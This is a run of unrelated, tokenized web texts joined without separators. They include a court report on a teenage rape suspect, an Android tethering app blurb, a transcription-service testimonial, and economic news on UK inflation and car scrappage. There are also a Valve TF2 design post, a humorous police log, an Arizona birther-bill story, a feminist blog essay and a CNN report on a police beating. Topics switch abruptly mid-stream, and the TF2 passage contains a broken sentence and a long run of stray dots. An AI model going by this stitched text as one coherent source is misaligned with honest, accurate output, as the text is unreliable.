Toowoomba police said the girl was co-hosting a 16th birthday party for a friend at the time and there was no parental supervision .
The defendant did not apply for bail yesterday while his mother and grandmother watched proceedings .
His case was set down for committal mention on May 27 in the same court .
Police requested DNA samples and disease test results from the boy .
He remains in custody .
Originally published as Boy , 13 , ' slashed and raped girl '
PdaNet + is one of the top Android applications of all time .
PdaNet + shares the Internet access of your Android phone with your computer or tablet .
PdaNet + works on all Android phones without rooting .
It also does not require a tether plan , that will save you $ 20 / month from most carriers .
PdaNet + supports connection using WiFi , USB Tether or Bluetooth DUN .
There is no speed limit in PdaNet + .
I am a chiropractor located in Erie , Pennsylvania .
As my business has grown , I ’ve needed a more efficient method of documentation .
I had tossed around the idea of dictating notes for years .
Several years back , I reached out to Managed Outsource Solutions for information about the dictation / transcription process .
I had talked back and forth with Jan Merrifield for a little while .
She was extremely helpful , full of information , and willing to help me .
I was n’t quite ready at that point in time to make the switch to dictation .
Jan never pressured me to start business with them if I was n’t ready .
Fast forward to 2018 , I began dictation / transcription with Managed Outsource Solutions in January 2018 .
Jan was instrumental in getting my chiropractic practice set up within their system .
The process was as about as easy as they come .
She took care of everything , so on January 2nd , I was able to send off my first round of digital files to be transcribed .
Wow !
The turnaround time is 24 hours !
Staying up to date and current with the documentation has never been so easy and efficient !
At the end of each day , my notes were done .
I ’d upload the notes at the end of the work day .
The notes were ready to download and place in patient files by the next day .
It was amazing !
The notes were accurate and exactly as they were dictated .
If there was confusion or concern in a particular note , Jan AND the transcriber were both emailing me alerting me to the concern .
The attention to detail and personal touch has been the best aspect of working with this company .
If you are a health care provider looking to have an efficient way to complete you daily notes , look no further than this company .
They are fantastic , professional , yet down to earth real people .
Toyota quickly suspended sales of its 2010 Lexus GX 460 sport utility vehicle on Tuesday after Consumer Reports magazine warned buyers that the model had a dangerous handling problem that could lead to a rollover and possibly “ serious injury or death . ”
Toyota ’s Lexus division withdrew the car just hours after the warning was issued Tuesday .
“ We are taking the situation with the GX 460 very seriously and are determined to identify and correct the issue Consumer Reports identified , ” Mark S. Templin , the Lexus group vice president and general manager said in a statement .
Lexus stopped short of voluntarily recalling the vehicle , but said it would provide a loaner car until a remedy is available to any concerned customers .
The National Highway Traffic Safety Administration said in a statement on Tuesday that it was in communication with Consumer Reports and Lexus .
The agency ’s files , as of Tuesday , showed no record of consumer complaints related to the 2010 Lexus GX 460 .
Higher petrol prices have contributed to the rise in inflation The UK inflation rate rose sharply to 3.4 % in March from 3 % the month before , official figures have shown .
The rise in the Consumer Prices Index ( CPI ) inflation rate was greater than analysts had expected .
Retail Prices Index ( RPI ) inflation , which includes housing costs , also rose sharply to 4.4 % in March from 3.7 % .
The CPI inflation rate is the measure targeted by Bank of England interest - rate setters , while RPI is often used as a benchmark in wage negotiations .
Higher air fares
Higher petrol prices were an important factor in rising consumer prices , the Office for National Statistics ( ONS ) said .
I do know that the MPC is keeping a very close eye on inflation expectations - and pay settlements - to see whether the higher headline rates of inflation in the past few months are becoming self - perpetuating
Stephanie Flanders , BBC economics editor
Read Stephanie 's blog in full Petrol prices have been rising because of the relative strength of the dollar and higher refining costs , as well as the increasing price of oil .
The price of oil hit 18 - month highs at the start of April .
The continuing impact of the rise in VAT , which went back up to 17.5 % in January , and the effect of flat gas bills relative to this time last year , when they fell sharply , also contributed to the spike in inflation .
The ONS said increasing air fares , especially on European flights , rising food and non-alcoholic drinks prices , and higher clothing and footwear costs also played a part .
Offsetting these were falls in the prices of second - hand cars , furniture and household equipment .
Low rates
Despite the sharp rise in prices , analysts expect the rate of inflation to fall again in the coming months , as weak economic growth and high unemployment dampen price rises .
The governor of the Bank of England , Mervyn King , has said that he expects inflation to fall back towards the target rate of 2 % in the coming months .
Analysts therefore expect the Bank to keep interest rates low to stimulate growth .
" We would not expect the Bank of England to be swayed by short - term movements in commodity prices , so today 's figures should not have much bearing on interest rates .
We still expect rates to remain on hold for the remainder of this year , " said Hetal Mehta , senior economic adviser to the Ernst & Young ITEM Club .
UK interest rates have been at the record low of 0.5 % for 13 consecutive months .
The policy helped to bring the UK economy out of recession in the last quarter of 2009 , when it grew by 0.4 % .
However , if prices continue to rise sharply , the Bank 's Monetary Policy Committee ( MPC ) may have to raise rates .
If the CPI inflation rate remains above 3 % in April , Mr King will have to write another letter of explanation to the chancellor .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
March 2 , 2010 - Brandon Reinhart
We 're plugging away at the Engineer update .
He 's an interesting class to work on , because he creates a larger footprint in the game than any other class .
This means we have a lot of options to work with , and the resulting set of ideas is truly daunting .
Since we 've already built and playtested some things that have n't worked out ( with no false modesty , I think we 've mastered the art of rapidly making things that are n't fun ) , we thought it might be interesting to give you some of our failed experiments .
The first was a new building internally known as the Repair Node .
We gave Engineers the ability to replace any current building ( teleporter entrances and exits were considered one building for this ) with the Repair Node instead .
While deployed , the Repair Node would draw from a pool of energy to fix damage to nearby buildings .
When the node ran out of energy , it would stop repairing and regenerate up to full , creating a window of opportunity for the attackers .
When sapped , the Repair Node 's repair function was disabled for the duration of the sap .
The goal of the Repair Node was to solve a perceived problem in the Engineer 's play experience : always having to be tied to your base .
The Engineer often has little to do after his base is built and fully upgraded except wait for the inevitable Spy sapper attempt , or for the battlefront to reach the base .
The Repair Node was meant to buy the Engineer time if he wanted to range out to gather metal or harass the enemy with his shotgun .
This is usually how we approach our game design : Identify a problem , then discuss the ways it could be solved .
Our experience told us that even when the Engineer did n't feel immediate pressure , he still could n't range out away from his base .
If a Spy , Soldier , or Demoman found the base unguarded , it did n't take long to blow up .
The further away an Engineer was , the fewer buildings he would be able to save from sapping .
We also felt that the Engineer invested a lot of up - front work to establish bases that were very easily destroyed .
Thus the repair node was born .
Play - testing the Repair Node showed us one expected , and two ( somewhat ) unexpected , outcomes .
The expected outcome was that bases were far harder to destroy , and turtling became a super effective strategy .
Fortunately , this is the kind of problem that can be attacked by turning the correct game design knob , and the Repair Node had a lot of available knobs .
We could lower the rate of repair , lower the amount of repair energy , lengthen the vulnerable period , and so forth .
We tried several options .
One change we made was to add diminishing returns so that two Repair Nodes working together were less than perfectly efficient , and adding a third did n't really help at all .
Despite the design choices we had available , we were never really able to get the Repair Node to feel balanced for the attacking team .
TF2 maps tend to be designed with very specific predicted Sentry placement locations and length of Sentry survivability .
The Repair Node distorted old favorite maps and made testing new ones more difficult by exaggerating intentional choke points and creating new choke points where they did n't previously exist .
The first unexpected outcome of the Repair Node was the team realizing just how valuable the Dispenser and Teleporter were to so many aspects of game pacing .
If the Engineer is n't able to build a Dispenser , his team loses the support power that the Dispenser provides .
In most games Dispensers are ubiquitous .
You do n't really realize what you 've lost until you 've lost it .
Fewer Dispensers had the effect of slowing attacking teams down in a variety of ways :
Teams were more fragile , metal was harder to get to the front lines , and team rally points were harder to define .
An Engineer who took a Repair Node instead of a Teleporter put his team in an even less viable position .
The pacing of many maps became completely broken without Teleporters in play .
Teams were n't able to push as effectively and the lines of battle moved closer to the spawn points .
This lack of flexibility meant that attackers were n't able to hold gains and matches took longer to complete .
The second unexpected outcome was downstream from the first .
Teams perceived Engineers with Repair Nodes as less " friendly " , specifically because they were n't building Dispensers or Teleporters .
In retrospect , older data at our disposal should have known this would happen .
Prior to TF2's release , the Medic had weaponry that was significantly more powerful , leading to highly skilled players playing Medic as a purely combat class .
Aside from the balance issues this created , it also resulted in a Medic that was n't interested in healing anyone , which did n't typically sit well with his teammates .
Their perception was that healing is the Medic 's job .
Medics who did n't do that were n't perceived to be team players -- an identical reaction to Engineers refusing to build Dispensers and / or Teleporters .
Like many design exercises we did n't learn what to do next so much as what NOT to do .
Lesson 1 : The problem of the Engineer being tied to his base still exists , but the Repair Node was too heavy - handed a solution .
If we solve this problem in the future , it will have to be in a way that does n't distort the existing balance between attackers and defensive choke points .
The problem of the Engineer being tied to his base still exists , but the Repair Node was too heavy - handed a solution .
If we solve this problem in the future , it will have to be in a way that does n't distort the existing balance between attackers and defensive choke points .
Lesson 2 : The Dispenser and Teleporter are really good .
We already knew this , but we did n't know that they were really , really good .
Encouraging Engineers to either avoid building them entirely , or to build them in weird ways , broke the game 's pacing immediately .
New buildings in the Engineer update will probably take the form of upgrades , or entirely new choices alongside the old buildings , instead of replacements .
In other news
These may seem like obvious lessons , but knowing for certaina particular idea does n't work can often be as valuable as an idea that does .
This process highlighted specifically where and why the Engineer is valuable , and how even slightly altering this value can have game - shattering implications .
Ultimately , the Repair Node was cut because it made the game more of a grind .
While it definitely made it less stressful to manage a base as an Engineer , it was n't .
The Engineer gained a little bit of fun , but nearly everyone else in the match suffered as a result .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , our minds were blown this week when we saw Andrew Kepple 's amazing Spy & Pyro cartoon .
We 've decided this is final proof that TF2 fans are smarter , more creative , and much better looking than fans of all other video games .
On the competitive side , we 've been addicted to watching Community Fortress 's eXtv series of commentated competitive TF2 matches .
If you have n't watched any , take a look at some great European and North American matches .
If you have n't watched much competitive play , eXtv 's commentary does a great job of helping you understand the tactics being employed .
• Saturday , February 27 10 a.m .
An unlocked Anina Way vehicle was naught more than a slithy tove donation box , said slitherer entering during the early morn and stealing the owner ’s flashlight , vehicle registration and insurance card .
1:27 p.m .
Saturday aft , she was downtown
Yelling at the passersby
Standing in the midst of madmen
Police calls piling high
Bellowing goofball on the west side
Yelled at people who were moving along
Just about to call up the police - men
Cause they heard the woman singing her song
Ascared of howled cries , made them open their eyes
And temperatures started to rise
She was a wrong - fool woman in a black dress
A 415 - type police call
But just one look turned up no shoutfest
Cause that wrong - fool woman had said it all
3:57 p.m .
An I Street business employee reported being presented – rather brusquely , it seems – a stark choice of destinies by his girlfriend ’s father .
The dad came to the 17 - year - old ’s workplace , he said , and told the kid to either stay away from his family or he would kill him .
A key detail of the proposal was that the lad “ keep his drunken genitalia away from my daughter . ”
11:47 p.m .
An Arcata resident reported receiving a text message from someone in Nashville , Tennessee , who wrote , “ Please call me in one hour if you have not heard from me because I am meeting the evil one soon . ”
• Sunday , February 28 2:07 a.m .
Three fine gentlemen were reported spitting on women near an H Street business .
The brave expectorators were nowhere in evidence when a cop cruised by .
12:28 a.m. Several folks were reported tearing a TV apart in the 900 block of F Street .
Police checked with the tube demolition crew , last seen plucking video wreckage from the roadway .
5:27 p.m .
A dinnertime bongo influxion
Required police for reduction
They went to South E
And tempered the spree
Which , for drummers , is serious suction .
9:02 p.m .
An unwell person attempted suicide at 14th and G streets , but did n’t push down hard enough on the razor blade he used on his left wrist .
The possibly drugged man was taken away for treatment .
• Monday , March 1 9:05 a.m.
A woman left her wallet on the table at a Valley West burger joint , and when she realized this and called the next morning , a miracle did n’t happen .
Lost were credit cards , cash , checks , ID .
12:50 p.m. A St. Louis Road residence is chronically broken in to , said the resident .
The previous night ’s interloper left handprints on the window .
3:01 p.m .
One of two neighbors in a hostility spiral offered passive provocation – or was it self - protection ?
– by standing in the road and videotaping the other as he milled about in his driveway .
The cameraman said he felt harassed .
5:09 p.m .
In what he later claimed was merely an attention - getting gambit , a man posted a suicide warning on Craigslist , stating that he “ got out of the crazy house where my ex put me … so she could rob me … ”
• Tuesday , March 2 12:02 a.m .
As a woman slept in the rear area of her boyfriend ’s unlocked residence , someone came in the front and stole his video game console and some games .
12:10 a.m .
In one of those quaintly named “ defrauding an innkeeper ” incidents which is hardly that at all , a person summoned a taxi from Mad River Beach .
He was driven to Ribeiro Court and then got out and , without paying , headed off in the direction of the hospital .
As the cabbie spoke to police , he spotted the deadbeat walking near Spear Avenue , where he went to someone ’s door and asked to use her phone .
The cab driver followed him until police arrived and detained him .
His parole officer was contacted and authorized the man ’s arrest .
11:51 a.m. Restraino - complainos do n’t stop the jackass in question from orbiting your house in his car and on his bike just outside the prohibited perimeter .
4:12 p.m .
A possibly unlocked vehicle on I Street was entered and a box of aluminum , wood and rubber knives used for educational purposes were stolen , a $ 100 loss .
• Wednesday , March 3 3:14 a.m .
One can only imagine the nature of the festivities in progress at the five - person “ party ” in Room 425 at the cheapest of cheap motels in Valley West .
A fairly impressive number of police officers interrupted their game of charades or Perquackey or whatever pastimes they had been engaged in and hung around while they cleared the area .
5:26 a.m .
An astounding amount of foot traffic at a recently renovated Union Street apartment warren led the downstairs neighbor to call police .
The upstairs resident was described as repeatedly walking back and forth , and continually going up and down the stairs as well .
The footloose occupant said he was gathering his belongings because he ’d been arrested the previous night , though the actual nature of that cause - and - effect is not detailed .
12:36 p.m. A Ninth Street work supervisor complained that she and her four female staffmembers were being subjected to sexual comments by a patron .
The problem had been reported before , police notified and the suspect counseled , but to no avail .
10 a.m .
An apartment dweller ’s roommate let her sudden husband move into their apartment , which is one thing .
But the new cohabitant proceeded to lose two things : a lot of weight in a short time , and his mind .
He thinks the apartment is bugged and that police and FBI surveillance cameras are trained on him .
He and the wife were to move out soon .
11:34 p.m . A raccoon in a Shirley Boulevard driveway was n’t particularly impressed with the tongue - lashing it got from the resident .
And as for that beer bottle she threw – whatever , lady .
But when an officer arrived , the ’coon skittered off .
• Thursday , March 4 12:55 a.m.
A live performance of contemporary music involved near - nuclear rhythmic thuddage at an extremely pink G Street house .
10:09 a.m . A downstairs neighbor has reportedly been calling the guy upstairs names and spitting on his windows .
The upstairsian feels harassed .
1:37 p.m .
After an officer was done dealing with the crazy woman who ’d taken a public dump on upper G Street , a change of uniform was in order .
8:23 p.m .
An alleged shoplifter gobbled salami nuggets at a 13th Street marketplace , and managed to get arrested for it .
• Friday , March 5 8:32 a.m .
An ongoing war between neighbors logged another casualty , suspected one – a cut garden hose .
10:30 a.m . A woman driving creatively in an I Street parking lot managed to smash into several vehicles as well as the building , then nearly hit another car at the lot ’s entrance .
1:45 p.m. A Redwood Avenue house is reportedly redolent with that telltale funky - skunky smell .
• Saturday , March 6 8:58 a.m.
A traveler on crutches reportedly assaulted a woman and took a sign away from her .
An investigating officer determined that there had been “ mutual combat over a marking pen . ”
• Sunday , March 7 11:15 a.m. Always - on - the - loose dogs in Maria Court earned their owner a warning , as did the car parked in the red zone out front .
5:51 p.m .
Another stinkhouse of the skunky strain was reported on I Street .
7:39 p.m. I do n’t like the way you park .
Let ’s argue .
Share this :
Share
Facebook
Reddit
LinkedIn
Twitter
Email
Print
UPDATE : The White House has ridiculed a proposed Arizona law that would force President Barack Obama to provide a birth certificate when he runs for president in the state in 2012 , calling the legislation a waste of taxpayers ’ money .
“ I ca n’t imagine Arizona voters think their tax dollars are well served by a legislature that is less focused on their lives than in fringe right - wing radio conspiracy theories , ” White House spokesman Bill Burton told CNN .
“ This is a question that has been answered exhaustively . ”
ADVERTISEMENT
The “ question ” at hand is Obama ’s citizenship .
The proposed Arizona law , which passed the state House this week but still needs Senate and gubernatorial approval , was inspired by the “ birther ” movement that believes Obama was n’t born in the United States and is therefore ineligible to be president .
Since Arizona ’s Republican - dominated
House passed the bill , lawmakers have found themselves at the receiving end of ridicule from numerous political commentators .
“ Members of the Arizona state House have made a strong bid for this year ’s coveted ‘ nuttiest legislative body ’ award , ” writes Robert Schlesinger at US News & World Report .
“ The legislation serves less to provide birthers with a way to nail Obama , and serves more to embarrass legislators in Arizona — as the birther bills in other states have embarrassed their sponsors , ” writes David Weigel at the Washington Post .
Weigel argues that the legislation is irrelevant because “ even if this Arizona bill is signed by Gov. Jan Brewer ( R - Ariz . ) it will … be answered by a certification of live birth from Barack Obama . ”
Weigel also points to a clause in the proposed law that gives the Arizona secretary of state the discretion to decide whether or not a candidate has met the requirements for eligiblity .
That power amounts to “ a nuclear weapon [ in ] the hands of a partisan elected official , ” but “ it ’s unlikely that the official could ever use that weapon , ” presumably because of the political backlash caused by a politician blocking an opponent from running in an election .
ADVERTISEMENT
Despite overwhelming evidence that President Obama was born in Hawaii — including affirmation from the state itself — a recent poll finds that only 58 percent of Americans say Obama was born in the US .
Twenty - three percent say they do n’t know , and 20 percent say he was born in another country .
ORIGINAL STORY FOLLOWS BELOW
An Arizona lawmaker fears her state is becoming a “ laughing stock ” after the state House passed a bill that will force President Barack Obama to present his birth certificate before being certified to run for president in the state .
Phoenix Democratic Rep. Kyrsten Sinema said the bill passed Monday is among a handful of legislative items that are making Arizona “ the laughing stock of the nation . ”
ADVERTISEMENT
While the bill does not target President Obama by name , requiring all presidential candidates to show proof of US birth , its intention is clear .
“ The legislation originated from a fringe group that believes President Barack Obama is not a natural - born citizen of the United States and therefore ineligible to be president , ” reports the Arizona Republic .
The law allows the secretary of state to keep a candidate from registering to run if he or she has “ reasonable cause ” to believe the candidate does n’t meet the necessary requirements , the Los Angeles Times reports .
ADVERTISEMENT
“ Republicans continue to take Arizona down the wrong track by wasting taxpayers ’ time on frivolous legislation instead of working on important issues like health care for kids and seniors and education , ” Sinema said , as quoted at the Republic .
The Arizona House of Representatives voted by a margin of 31 to 22 on Monday to add the measure to a larger bill .
The bill will have to be voted on again , separately , in the House , and will have to get Senate assent before it can be sent to Gov. Jan Brewer for her signature .
“ Attempts have been made in other states , such as Florida and Oklahoma , to introduce similar legislation , ” the New York Post reports .
“ None of them have ever become law . ”
ADVERTISEMENT
The Republic notes that there are concerns about the bill ’s constitutionality .
Arizona Secretary of State Ken Bennett also expressed concern about Burges ’ amendment , saying that creating state - level eligibility requirements to run for federal office could violate the U.S. Constitution .
“ While everyone has an interest in ensuring that only eligible citizens run for president , there are obvious issues with states implementing what could become a patchwork of different tests for a presidential candidate to prove his / her citizenship , ” said Bennett ’s spokesman , Matthew Benson , in an e-mail .
On Monday , the Arizona state Senate voted in favor of a controversial immigration bill that would “ make it a state crime for illegal immigrants to not have an alien registration document , ” the AP reports .
“ It also would require police to question people about their immigration status if there ’s reason to suspect they ’re in the country illegally . ”
That clause about questioning people without suspicion has raised the ire of civil libertarians , who say it will infringe on basic human rights .
On Sunday , the head of the US ’s largest Catholic diocese compared the law to “ Nazi ” and “ communist tactics ” used to sniff out dissidents .
ADVERTISEMENT
“ I ca n’t imagine Arizonans now reverting to German Nazi and Russian Communist techniques whereby people are required to turn one another in to the authorities on any suspicion of documentation , ” Cardinal Roger Mahoney wrote on his blog , describing the bill as “ the country ’s most retrogressive , mean - spirited , and useless anti-immigrant law . ”
March 23 , 2010 - L4D Team
That 's right , Internet blog readers !
It 's tax season here at Valve , and we need to CLEAR OUT our digital warehouses !
What does that mean for you ?
How about the award - winning Left 4 Dead 2 , now available for 50 % off the original price ?
( March 23rd to March 25th ) But there 's more !
We are SLASHING the prices on ALL of Left 4 Dead 2 , including 4 packs
Here 's what you 'll get !
But hold on , ' cause we ain't done !
Coming out this Spring for Left 4 Dead 2 is the brand new DLC " The Passing " , which contains : Was that a typo ?
Game Modes ?
Did n't we mean Game MODE ?
Did we mean to include that " S " ?!?!?
YES WE DID !
This sale ends Thursday !
so RUN , do n't walk , to where you are already sitting reading this , and buy your copy of Left 4 Dead 2
Anti-austerity protests are raging right now in Athens , with public transport idle , flights grounded and hospitals left with emergency staff according to the Associated Press .
Worse yet , it 's pretty clear that nobody wants to take responsibility for their country 's financial situation .
The union certainly does n't :
Reuters :
The private sector union GSEE and its public sector sister ADEDY , which together represent half of the country 's 5 million workforce , say the EU - backed austerity plan will hurt the poor and aggravate the recession - hit country 's economic problems .
" Workers will raise their fist and shout with one voice :
We wo n't pay for the crisis , " GSEE said in a statement .
" No one , nothing is going to terrorise workers . "
By this they mean that they want to continue receiving income and benefits that are ultimately financed by unsustainable debt growth for their country .
So if they are n't willing to pay , who should finance their current level of income and benefits ?
What if their current level is n't justified by their output ?
Picture it .
It 's 1973 .
You are a housewife ( not a homemaker , since that term has not yet come into vogue ) busy caring for an active two - year old .
In the middle of the week , your husband 's boss says to your husband , " We really need to cultivate members of Such - and - Such group .
Why do n't you have your wife host a get - to - know - you tea for their wives and our wives ? "
Or perhaps your husband 's boss says to your husband , " The negotiations for that big deal seem to be going really well -- but it would be probably smooth the way a bit if we all got to know each other a little better .
I think you should have your wife put together a dinner party this weekend for the men involved and their wives . "
Your husband calls you to relay this command and next thing you know you are planning , shopping , scrubbing , polishing , decorating , cooking , and stressing out .
Naturally , none of this work is compensated in any way .
At the end of the dinner party , your husband 's boss turns to you with a condescending smile and says , " This was really quite a spread that you put on .
It 's nice that you have something to keep you busy . "
This kind of thing happens to you all the time throughout the ' 70s until wider acceptance of feminism made verboten this expectation of having one 's employees ' wives at your beck and call for massive unpaid projects .
Your daughter naturally becomes The Happy Feminist early on because , even as a little girl , she is sick and tired of seeing you regularly treated with an enormous lack of respect .
Anti-feminists try to divide - and - conquer by pitting housewives against feminists .
But feminists did n't invent the widespread lack of respect for housewives that admittedly sometimes colors the words of feminists too ( like Linda Hirshman -- who , by the way , has been loudly criticized in feminist cirles for her derogatory language ) .
A lack of respect is inevitable when a class of people has no money , no power , and no public voice .
Being taken for granted is inevitable when you are simply doing something you have little choice in .
I cannot claim to have studied this phenomenon in a sociologically rigorous manner -- but my personal experience and observation is that the status of homemakers has increased with the rise of feminism .
Even the relatively new term , " homemaker , " evinces a recognition that women who cook and clean and sew and decorate and budget and care for children are more than just wives who stay at home .
Today , homemakers are more powerful than ever before .
They are more organized , more outspoken in the public sphere , and more likely to have educations and careers that make them less dependent on their husbands than in the past .
They are less likely to be disregarded or excluded from the conversation or treated condescendingly if politics or other Important Subjects arise .
They are less likely to be taken for granted since they have other options .
Those who claim to prize the efforts of women in the home will often inadvertently reveal how little they think of how women at home spend their time .
Consider this profile Constitution Party leader Howard Phillips wrote about his wife , Peggy Phillips , when she was awarded the Homemaker of the Year award by Phyllis Schlafley .
The profile speaks at length about the activities and accomplishments of Mrs. Phillips 's father , her husband ( Howard Phillips himself ) , and each of her children -- but says nothing at all of what Mrs. Phillips DID in the home , other than giving birth .
There is an oblique reference to the youngest son's homeschooling , but it is not even clear that Mrs.
Phillips conducted the homeschooling , although presumably she did .
The fact is that her labors and her efforts are taken for granted and invisible even when she is purportedly being honored for them !
Of course , homemaker and feminist are not mutually exclusive terms .
There are plenty of stay - at - home - mothers who ARE feminists .
I can't speak for them but I suspect they realize that the furtherance of women 's equality in all spheres of life will help to make homemaking a truly voluntary choice and will thereby also raise the status of all women .
UPDATED : I bet I can write a a better tribute to a homemaker than most anti-feminists !
I just finished reading a book called Anatomy of the Bear where the point was made that rising new car sales are a leading indicator for the end of recession .
No wonder then that many OECD governments introduced incentive schemes to boost new car sales following the dive off the cliff that accompanied the credit crunch ( Figure 1 ) .
Cash for clunkers in the USA was called the Scrappage Scheme in the UK .
No prizes for spotting when the credit crunch recession began in the UK .
But what will happen now that the scheme is due to end shortly ?
So why are new car sales of interest to The Oil Drum ?
Transportation is of course one of the main consumers of petroleum .
But since the oil price spike of 2008 , I think many have become aware of the links between economic growth , energy consumption , energy prices and how this impacts forward production capacity .
It 's a much more complex web than I ever imagined .
New car sales are but one economic indicator of things to come .
The UK car scrappage scheme
The UK car scrappage scheme was introduced in May 2009 to rescue the auto industry from car sales that were plummeting in response to high energy prices and the credit crunch .
Cars that were 10 years old or older , most of which would have no intrinsic value , could be traded in for £ 2000 part exchange for a new car .
The government provided £ 1000 of this subsidy and the motor manufacturer the rest .
As figure 1 shows , this £ 2000 subsidy did the trick and car sales began to recover immediately .
I personally took advantage of the scheme in December and discovered that the incentives on offer went way beyond the £ 2000 scrapage .
As described below , Volvo made me an offer I could n't refuse .
The government initially allocated £ 300 million to the scheme ( 300,000 cars ) but in September 2009 the scheme was extended by £ 100 million which meant that it carried on into 2010 .
It should have ended at the end of February but has been extended again to the end of March and is therefore still active .
I 'm expecting car sales to decline once the scheme ends but April 's statistics will come too late to influence the outcome of our General Election that will be held in early May .
It is hard to not suspect some cynical electoral manipulation at work here .
The UK car market
Pre-recession , the UK car market was running at approximately 2.4 million units per year .
Monthly sales are highly distorted by a quirk of UK license plate system where the first two numbers of the plate indicate the date of manufacture .
This used to reflect an annual period , and motorists would wait to buy a car when the new annual plate was issued .
Since this distorted the market , this was changed to a 6 monthly date mark , but the market is still hugely distorted .
In March and September when the new license plates are issued sales are more than double the monthly means .
In the preceding months , February and August , sales are less than half the monthly means , as motorists delay purchases in order to get the new license plate .
Figure 2 UK new car sales are heavily distorted by new license plates issued in March and September of each year .
The September 2009 peak is pulled up by the scrappage scheme but is still well below pre-recession levels .
Figure 3
The recession began mid-2008 , hence the 2008 figures are affected by only 6 months poor trading .
The Scrappage Scheme introduced in mid-2009 has inflated the 2009 figures which are still below 2008 .
2010 figures will benefit from 3 months of Scrappage and then we will see how robust UK economic recovery really is .
The other notable seasonal effect is that June is always the peak sales month outside of the March and September peaks .
Given the highly variable monthly sales figures , it is tricky to discern trends from the raw data , though the March and September peaks are clearly down in 2008 / 9 as a result of the recession .
Hence , it is easier to view trends from the year on year ( YOY ) changes to monthly sales ( Figure 1 ) but even these need to be viewed with caution since the spectacular rebound from July 2009 needs to be viewed against the very depressed sales figures from the previous year .
Since July 2009 , car sales are still running well below levels of two years ago .
As of 28 September 2009 , 227,750 motorists had taken advantage of the scheme .
In the period June to September 2009 , 768,348 new cars were registered , thus the scrappage scheme accounted for 30 % of new car sales in this period .
Of course we do not know how many scrappage buyers may have bought in any case , but as described in the box below my own decision to buy a new car was totally swayed by the discounts that were on offer .
In 1995 , whilst I was still running a small business , I bought a new Volvo 850 , 2.5 L estate car .
My children then were 5 and 3 years old , and this car was to become a much loved family work horse .
15 years later , and with 140,000 miles on the clock , this old car still had much life left , but year on year was costing an awful lot to keep on the road .
With the scrappage scheme knawing away at the back of my mind , I ventured up to the Volvo dealer mid December 2009 , thinking about buying a second hand replacement .
And there in the middle of the showroom was a spanking new Volvo V50 .
I told the salesman I was wanting to buy a used car .
He told me that in addition to the £ 2000 scrappage , Volvo were offering additional discounts to existing Volvo owners .
At this time UK VAT ( sales tax ) was reduced form 17.5 to 15 % and all in I was offered £ 5,500 discounts on the new V50 in front of me .
Not only that , this 1.6 diesel model did over 60 miles per gallon and because it was so green :-) the annual road tax would only be £ 35 ( compared with our other car that costs £ 220 to road tax per year ) .
I thought about all of this for about 3 seconds , and told the salesman that the breadwinner would have to approve .
We concluded the deal the same day .
Without all these incentives I would have bought a used car .
Where next ?
On the back of £ 200 billion in quantitative easing ( QE ) , the car scrappage scheme , a cut in value added tax ( VAT ) from 17.5 to 15 % , reduction in tax on property transactions and running up mind boggling debt , the UK managed to squeeze out 0.3 % growth in the 4/4 of 2009 .
QE has been suspended though looks likely to return , the VAT reduction has now been reversed and car scrappage is in its final month .
Figure 4 UK GDP quarterly figures and 4/4 running mean from UK government statistics .
The impact of car scrappage looks like it peaked in the 4/4 of 2009 ( Figure 1 ) .
Most of those who owned a 10 year old car and who felt inclined have traded already and the stimulus looks like it has run its course .
When it ends , motor manufacturers will do what they can to fool the public with false bargains .
I 'd guess that by the 3/4 of 2010 , when YOY growth will be compared against months with positive impact from scrappage , that contraction will return to the auto industry , and with it contraction in the UK economy as a whole .
The UK has a general election in May .
A cynic may think that the recovery has been finely engineered to benefit the incumbent Labour Party .
In my last post I gave a gloomy prognosis for the economy and energy prices and nothing has happened since then , apart from stubborn optimism in the markets , to make me change my mind .
( CNN ) -- A Prince George 's County , Maryland , police officer has been suspended , and prosecutors are investigating an incident -- caught on video -- in which officers wielding nightsticks beat a University of Maryland student , officials said Tuesday .
Authorities also are looking into documents filed by police in the case that appear to contradict the video , Prince George 's County police Lt. Andy Ellis said .
The video was shot March 3 after the Maryland men's basketball team defeated Duke .
In the video , students can be seen celebrating the win as officers in riot gear and on horseback are nearby .
Some students are holding up their cellphones , taking pictures or video of the officers and the celebration .
The video shows a student identified as John " Jack " McKenna skipping down the street and approaching two officers on horseback .
After a brief exchange , two officers on foot slam McKenna against a wall and he falls to the ground .
A third officer joins the first two , and the three strike McKenna with nightsticks while he is on the ground as other students scatter .
McKenna had a cut on his head that required eight staples to close , said Sharon Weidenfeld , a private investigator working for McKenna 's attorney , Chris Griffiths .
In addition , he had a concussion , a badly swollen arm and bruises elsewhere on his body .
Griffiths ' office referred questions to Weidenfeld on Tuesday .
Another man identified as Benjamin Donat was also beaten , although that incident was not shown on the video , Weidenfeld said .
On Donat 's body , the imprint of the officers ' nightsticks could be seen , she said .
He also suffered a head injury that caused him some memory loss for a few days , although he will be all right , Weidenfeld said .
" He really had his bell rung , " she said .
Weidenfeld discovered the video and would say only that it was shot by another University of Maryland student .
Authorities arrested Donat and McKenna on suspicion of assaulting an officer and disorderly conduct .
Documents filed by police allege that the two were causing a disturbance and that they struck mounted officers and their horses , causing minor injuries , when authorities intervened .
" Arrested 1 and Arrested 2 were both kicked by the horses and sustained minor injuries , " the charging documents said .
The video does not show McKenna striking the mounted officer or horse , and the horses were not nearby while the beating was taking place .
The documents tell a " totally fabricated story , " Weidenfeld said Tuesday .
Prosecutors dropped charges against Donat on Friday and McKenna on Monday , she said .
Griffiths is representing both youths , and a lawsuit is planned against the officers , Weidenfeld said .
" I was very disappointed to see the conduct of my officers on the tape , " Prince George 's County Police Chief Roberto Hylton said at an afternoon news conference .
" I 'm very disappointed in what I saw . "
He emphasized that he wanted to make sure that the officers , once identified , get a " fair and impartial investigation . "
Although he came down on the officers seen on the tape , he also said the students ' celebration involved setting fires , rocking buses and throwing things at officers .
" There is a two - party fault here : the students , but also you can see I am very disappointed by the actions of my officers , " he said .
The department 's internal affairs unit is investigating the incident , and will assist Prince George 's County prosecutors in their probe , Ellis said .
" The charging documents certainly do not appear to be supported by the video , " Ellis said .
But he said , " I 'm sure it 's a stretch to say it 's a cover - up , " saying it 's likely the officer who wrote the documents had a " miscommunication " with officers involved in the incident , who provided information .
Read the charging documents from CNN affiliate WJLA - TV ( PDF )
The department 's internal affairs unit is investigating and will assist Prince George 's County prosecutors in their probe , he said .
Ellis said he did not know whether the officer suspended wrote the charging documents .
